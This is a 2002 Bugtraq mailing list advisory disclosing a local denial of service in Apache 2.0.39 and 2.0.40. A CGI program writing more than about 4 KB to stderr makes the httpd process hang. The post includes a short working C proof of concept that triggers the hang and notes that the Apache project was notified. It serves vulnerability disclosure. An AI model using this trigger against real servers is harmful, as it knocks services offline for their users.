Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Apache 2.0.(39|40) DOS (PHP!)

From: shaddup () hush com
Date: Mon, 23 Sep 2002 12:33:04 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -=~=-_-=~=-_-=~=-
I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, 
because it's easy to write insecure applications, unlike C.
- -=~=-_-=~=-_-=~=-
Problem:
 o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 will hang on a write to stderr that is larger than the default buffer
 size (4k on Linux)
Impact:
 o Local users can cause apache's httpd process to hang
 o Possible new DoS to look for in web apps that write
 user input to stderr!
Tested on:
 o Linux (RedHat)
 o FreeBSD (did not show a problem, but not well tested)
Notification:
 o The Apache Projekt was contacted July 9th, 2002
   (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)

- -=~=-_-=~=-_-=~=-
Sample Code
- -=~=-_-=~=-_-=~=-
// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i < SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        fprintf(stdout, "Context-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "<HTML>\n");
        fprintf(stdout, "<body>\n");
        fprintf(stdout, "<h1>hello world</h1>\n");
        fprintf(stdout, "</body>\n");
        fprintf(stdout, "</HTML>\n");
        fflush(stdout);
        exit(0);
} // main()


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
=8PKT
-----END PGP SIGNATURE-----




Get your free encrypted email at https://www.hushmail.com
Previous By Date Next
Previous By Thread Next

Current thread: